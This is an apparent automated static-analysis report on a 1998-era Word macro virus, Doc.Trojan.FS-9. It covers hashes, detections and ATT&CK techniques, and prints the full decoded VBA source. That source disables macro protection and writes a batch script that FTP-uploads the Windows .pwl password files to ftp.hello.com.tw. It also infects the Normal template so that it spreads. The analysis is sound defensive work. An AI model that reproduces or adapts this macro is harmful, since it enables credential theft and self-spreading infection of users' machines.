Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63176ae1c1dbdea1…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 2000-02-27 22:35:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 6a415d6d910f3a7c3abaa7285ae62cfa
SHA-1: 63ce88da2c59f6e59338c0627e6ed979cf335681
SHA-256: 63176ae1c1dbdea1fb3b8238abca21c1b8e4a1bc8610446922a7e78e8e17ef41
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer

The sample is a Microsoft Word document containing VBA macros. On Document_Close the macro writes a batch file to 'c:\-.bat' and executes it with the Shell() function. The batch file builds an FTP command script named '-' (login, binary mode, and a 'put' line for each %windir%\*.pwl password-list file), runs 'ftp -s:-' against 'ftp.hello.com.tw' to upload those files, then deletes both the script and itself. This indicates an attempt to exfiltrate sensitive information or download a secondary payload.

Heuristics (3)

  • ClamAV: Doc.Trojan.FS-9 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.FS-9
  • VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  1452 bytes
SHA-256: ed76e2a478cd3a22427fa4238f3b07047b51a656e607aff8cf7f1d43bada170b
Detection: ClamAV: Doc.Trojan.FS-9
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Lurcher
Private Declare Function RasEnumConnections Lib "RasApi32.DLL" Alias "RasEnumConnectionsA" (lprasconn As Any, lpcb As Long, lpcConnections As Long) As Long
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 1 - 1
Options.SaveNormalPrompt = 1 - 1
If RasEnumConnections(32, 0, 0) <> 0 Then
Open "c:\-.bat" For Output As #1
Print #1, "@echo off" & Chr(13) & Chr(10) & "ctty nul" & Chr(13) & Chr(10) & "echo virii>-" & Chr(13) & Chr(10) & "echo hieis>>-" & Chr(13) & Chr(10) & "echo binary>>-" & Chr(13) & Chr(10) & "for %%. in (%windir%\*.pwl) do echo put %%.>>-" & Chr(13) & Chr(10) & "echo bye>>-" & Chr(13) & Chr(10) & "ftp -s:- ftp.hello.com.tw" & Chr(13) & Chr(10) & "del -|del -.bat" & Chr(13) & Chr(10) & "ctty con" & Chr(13) & Chr(10)
Close #1: Shell "c:\-.bat", 0: End If
Set α = IIf(MacroContainer <> "Normal.dot", NormalTemplate, ActiveDocument)
With α.VBProject.VBComponents(1).CodeModule
If υ.Find("~^^~", 0, 0, 0, 0, 0, 0) = 0 Then _
.DeleteLines 1, .CountOfLines: _
.AddFromString ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 70)
End With: End Sub